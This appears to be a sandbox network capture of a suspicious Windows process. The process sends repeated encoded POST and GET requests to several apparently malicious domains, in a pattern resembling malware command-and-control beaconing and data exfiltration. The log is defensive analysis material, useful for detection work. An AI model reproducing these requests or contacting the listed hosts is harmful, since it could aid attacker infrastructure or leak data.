                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30


                                                    Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 50000 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:15.023931026 CET | Bytes transferred: 514 | Direction: OUT | Data: GET /hf4a/?CviT=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.ripbgs.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Timestamp: Jan 13, 2025 09:35:16.629235029 CET | Bytes transferred: 139 | Direction: IN | Data: HTTP/1.1 567 unknown
                                                    Server: nginx/1.18.0
                                                    Date: Mon, 13 Jan 2025 08:35:16 GMT
                                                    Content-Length: 17
                                                    Connection: close
                                                    Data Ascii: Request too large


                                                    Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 50002 | Destination IP: 162.0.236.169 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:37.807696104 CET | Bytes transferred: 787 | Direction: OUT | Data: POST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=VfWDBivlspRsxitfK3wokUr5TbJsAHkKV8EBGINzqfD4nXhxmOzX7ntXKDWYP6x+NFb4O09hhT3FrMf+3OAlURRBm/pRhT/Z/D7jJOhPKndPHu1CUTY78+TWaBZFAr2WMS6KD9LQwQR4I8M0OxXoGHkMBP8VoHHiExwcdU1NqSWSiUq3ctxTvdG/K9bgo9JJ4JwE6jKK9rcR
                                                    Timestamp: Jan 13, 2025 09:35:38.388261080 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:38 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 50003 | Destination IP: 162.0.236.169 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:40.375359058 CET | Bytes transferred: 811 | Direction: OUT | Data: POST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtn4mzlxnNrX+ntXAjWdL6x1NFfaO0RhhQLFrJj+29omSRR5yPpXvz/Z/D7jJO0oKnVPAeFCOyY00eTVdBZFEr2aMS6sD5K3wT54I+E0OgXrd3kOMv93gieAKSwfaFJQ2QuXqC3tAexw9Nm9K/DSodJj6JIEo0Gtyf5y2HEFqNhrDNdoC7V979O3Kg==
                                                    Timestamp: Jan 13, 2025 09:35:40.969507933 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:40 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 50004 | Destination IP: 162.0.236.169 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:42.926531076 CET | Bytes transferred: 1824 | Direction: OUT | Data: POST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Timestamp: Jan 13, 2025 09:35:43.514452934 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:43 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 50005 | Destination IP: 162.0.236.169 | Destination Port: 80 | PID: 6688 | Process: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp: Jan 13, 2025 09:35:45.548999071 CET | Bytes transferred: 520 | Direction: OUT | Data: GET /t0rn/?YFCLW=BxgTctSh&CviT=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Timestamp: Jan 13, 2025 09:35:46.127190113 CET | Bytes transferred: 548 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:46 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.6 | 50006 | 192.186.58.31 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:35:51.520896912 CET | 775 | OUT | POST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=iZAMmr5zjOmZB8AdRHgO1SZ57oHBnaGa0wUy8K3KOLoIbQc7tMY1KXySWsFjgOB9yDzrXpaHLdRx39BBISbesRKlcQv/O8Cg0bemiQI1Z6bGnJrxqTi+QGMJ7goszUpmJE5BYCL0tekvvydSBghV0BmF2pUm1LhId6AMCvQQPjYYo07zSrOmV2UrLQHSbr6/kyZ4SarAe0/I
                                                    Jan 13, 2025 09:35:52.389759064 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: d404 Not Found0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.6 | 50007 | 192.186.58.31 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:35:54.070956945 CET | 799 | OUT | POST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5MIbwM785s1G3ySZMFmkOB2yDuUXpmHLZ5x38RBLlvfsBKwRwv9TsCg0bemiQcPZ6DGg57xoyi/OWMI8gos3UpiJE53YGLOtbgvvytSPVBWvxmD4JVnz4kdZsZedNQARQonpCmpOYOFHm0pLSfgbL6Vmyh4ANnnRAarMGpCRZ/z7XI/Ksgh90UUHg==
                                                    Jan 13, 2025 09:35:54.999159098 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: d404 Not Found0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.6 | 50008 | 192.186.58.31 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:35:56.616311073 CET | 1812 | OUT | POST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5EIbD07uuA1F3ySQsFnkOBryDmYXpqXLf9xmuJBDxzfjBKwYQv+O8CP0avviQMPZ6DGg//xsji/JmMJ7gogzUpaJFRnYGPetoovvWJSCBhWjxmBtJU0z/tNZoxadM0uRT0noUrfe6TfWnUFfVmFTfOisSl3K+6ROSjECxdjVvGXsUcCVsRLxWEadlJrFgWaHPedacjx4lL/2/47oqQh0bZnF6TCLJSXdbVlz/C52XcFzzQzIS5G7cfaDvEhWZ+rXPxfpmItkYW8d/tRSu/WcnVT26bNUZhkuomKddG3BZg86gHzXcuvb8Rll+bKQVMGDTGq0Ub1vFrpFsR28uw63hW7ue+hVxYTxbkKbZ8C71/Li1r099TWK59WJ8LmffW45gbGdO7OGMvxd4ZONtuc4rgNpaOzhZsYFD8CNcJiHq3eWTbp6h9MGb6KC6uu7TxLyr4yCa3x9tdeYq2m9hJwD2hgkAS5mph9l/4zuAoZqppM8yuuXd/anPnk3Jv8Vo77ofF4z3y9yLB0qNeD4mI4b/bCFXohcA4ZNIoGPymsSbFrpxrKf2dHd4c6DSGORtJCN0DhJUg2BQ6vELekf8mhvJdXDkFcpXOPFuCnqQHOa+h0ArDET7Ai6/B4NBdV8voY6vHvtAPRq1fxmPNuG88tyH4jQfEZ/u+8Bs9S1aRRGoIFgo+wMIsFV/8i4yf+20Nij1kEmzp3HFojWPWluakkS02Jr/8NRzw/NcaLgc5uxMXxL4MiP4h4Ic2Eh7MN7Iw14pEP5d+hq4+lrBEiy8NzN7yRZOrHLpTrUeWgWc1PFhULCxM50XDonCeVRlxCCCBa0ZQGCUbwTeZBoMqNpgq7++6kUnyhhIueU61SP/NTN1JaozLWvnV125U5QasVu0aOcW89RFVpm7Z9OfNVcR+axYBxEmUA9hNX3B6TFB6jIZG7mDnBQFY4JKSJroib6wIUybqxJxy [TRUNCATED]
                                                    Jan 13, 2025 09:35:57.536473989 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:57 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Ascii: d404 Not Found0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.6 | 50009 | 192.186.58.31 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:35:59.157665014 CET | 516 | OUT | GET /wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:36:00.141891956 CET | 1236 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#22303;&#35946;&#30452;&#25773;&#20813;&#36153;&#19979;&#36733;&#23433;&#35013;&#25163;&#26426;&#29256;</title><meta http-equiv="keywords" content="&#22303;&#35946;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#22303;&#35946;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#22303;&#35946;&#30452;&#25773;&#26368;&#26032;&#29256;&#26412;&#30452;&#25773;app&#21019;&#24314;&#20110;2005&#24180;&#26368;&#21021;&#21482;&#26159;&#19968;&#20010;&#23567;&#22411;&#30340;&#20307;&#32946;&#36164;&#35759;&#32593;&#31449;&#32463;&#36807;&#22810;&#24180;&#30340;&#21457;&#23637;&#22914;&#20170;&#24050;&#32463;&#25104;&#20026;&#20102;&#22269;&#20869;&#30693;&#21517;&#30340;&#20307;&#32946;&#36187;&#20107;&#25253;&#36947;&#23186;&#20307;&#30340;&#210 [TRUNCATED]
                                                    Jan 13, 2025 09:36:00.141910076 CET | 1236 | IN
                                                    Data Ascii: &#28909;&#29233;&#20307;&#32946;&#30340;&#24180;&#36731;&#20154;&#20182;&#20204;&#28145;&#30693;&#20307;&#32946;&#22312;&#20154;&#20204;&#29983;&#27963;&#20013;&#30340;&#37325;&#35201;&#24615;&#24076;&#26395;&#36890;&#36807;&#20026;&#
                                                    Jan 13, 2025 09:36:00.141926050 CET | 1236 | IN
                                                    Data Ascii: "><link rel="stylesheet" href="http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb034.css"></head><body cache-app-id="12685" data-app-id="94468" data-track="" data-suffix="" data-title="&#22303;
                                                    Jan 13, 2025 09:36:00.141948938 CET | 1236 | IN
                                                    Data Ascii: th.js" crossorigin="anonymous"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/js/nc.js"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/
                                                    Jan 13, 2025 09:36:00.141964912 CET | 1236 | IN
                                                    Data Ascii: "detail"></form><tt draggable="bde9cd"></tt><var dropzone="e65186"></var><area date-time="14251e"></area><div lang="3d7afd" class="lc227f user-info"><img draggable="426ecd" class="m9dfbf avatar" id="header_avatar" src="http://www.babyzhibo.net
                                                    Jan 13, 2025 09:36:00.141979933 CET | 1236 | IN
                                                    Data Ascii: ="a09088 nav-item"><a class="b213d9 first-link" href="/special"><span></span></a></li><li class="c94c69 nav-item"><a class="d5b01b first-link" href="/award"><span></span></a></li><li class="ea7252 nav-item"><a class="fae356 f
                                                    Jan 13, 2025 09:36:00.141993046 CET | 776 | IN
                                                    Data Ascii: </div><area lang="c67f92"></area><map draggable="9ee1f7"></map><bdo dropzone="45a73c"></bdo><div date-time="bc0df0" class="o57a0d input-wrap"><input type="text" id="login_phone" class="p0b100 inner-input" placeholder="
                                                    Jan 13, 2025 09:36:00.142008066 CET | 1236 | IN
                                                    Data Ascii: mber" id="login_code" class="u017fe inner-input" placeholder=""><span id="login_getCode" class="v516b9 verify-btn active"></span></div><map dropzone="aaf0a2"></map><bdo date-time="ab7c9b"></bdo><dfn dir="
                                                    Jan 13, 2025 09:36:00.142024040 CET | 1236 | IN
                                                    Data Ascii: e="49cccc"></small><sup dir="53e24f"></sup><div dropzone="90f65c" id="user_modal" class="c447db user-modal"><time lang="324711"></time><tt draggable="bb8c8e"></tt><var dropzone="d9466e"></var><div date-time="624654" class="d8ff6a modal-wrap pc
                                                    Jan 13, 2025 09:36:00.142039061 CET | 1236 | IN
                                                    Data Ascii: ime="12ed88"></font><ins dir="faa8e3"></ins><small lang="f071f3"></small><div lang="022696" class="l51622 container" itemscope=""><meta content="http://www.yuehaizhibo.net" itemprop="url"><sup draggable="680eb3"></sup><time dropzone="ed5456"><
                                                    Jan 13, 2025 09:36:00.146886110 CET | 1236 | IN
                                                    Data Ascii: ss="sf6b53 crumb-h1"><span class="tbadd3 current">&#22303;&#35946;&#30452;&#25773;</span></h1></div></div><time date-time="336a5d"></time><tt dir="fbb2e6"></tt><var lang="189ea1"></var><div lang="ea1cfd" class="u8eca1 detail-wrap"><area


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.6 | 50010 | 104.21.16.1 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:36:06.398170948 CET | 772 | OUT | POST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=gn7QfkN0RCNMuyWFId6FlOlLJRugQnEq62SwjVsOzB9I77z6/zXYo1dw2C89MoE+31xlXQrdtX12dCw44J313K8KOLzm/HcOxF1zpc4inPxOEZRTIPci9Wl3ebqcBUhcLUL+bR2z5KfP6YhVfBve93WtiNBGz6m8ZRRraVMfd0QBbvUv73I2ILrXwcWOtvSyUPPnNIA7eE7f
                                                    Jan 13, 2025 09:36:07.298295975 CET | 970 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC2qw032OEnNs%2BmHTjkFpusK2%2FpAfFZhhfvEXxqZxN7IbuYilUOenkXrwRJbtV9%2BGxaiUjJL0YiOz%2B3kIp35M2FXX4nsqXFLxurg5V2cLZKhVkM6m6hd01ybBlGMM5Q7nQhr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140e867f2f8ce0-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=772&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.6 | 50011 | 104.21.16.1 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:36:08.946518898 CET | 796 | OUT | POST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Ascii: CviT=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzZI7eP6+yXYt1dw5i8yCIEl310PXVrdtXh2dCA44+j22a8IGrzkiXcOxF1zpcEInPpOEphTOd1Qz2l2ZbqcXUhYLULcbTOZ5InP6clVfwvdy3WvstAG2L/rQgZrY0kldVMYeZJ1nEIVabLVweO8tPSYWP3nffMcRwe8gzflja09gtJyNIaDvKmwFQ==
                                                    Jan 13, 2025 09:36:09.838385105 CET | 980 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeNl2hckcJYVSxWr37%2FQLF6aX8xIag%2Fdkg%2FtqmU00yrE%2B0b7KCkQpWd2pY7nrskp12m9%2FlcVpG4L6jAdG93%2B8jr%2FOjl6gfmJynCtKa48Dhei%2FGbAHwD0GsB1WKrDaRPD7%2BNT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140e96584b1899-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.6 | 50012 | 104.21.16.1 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:36:11.491955042 CET | 1809 | OUT | POST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:36:12.416405916 CET | 975 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:12 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
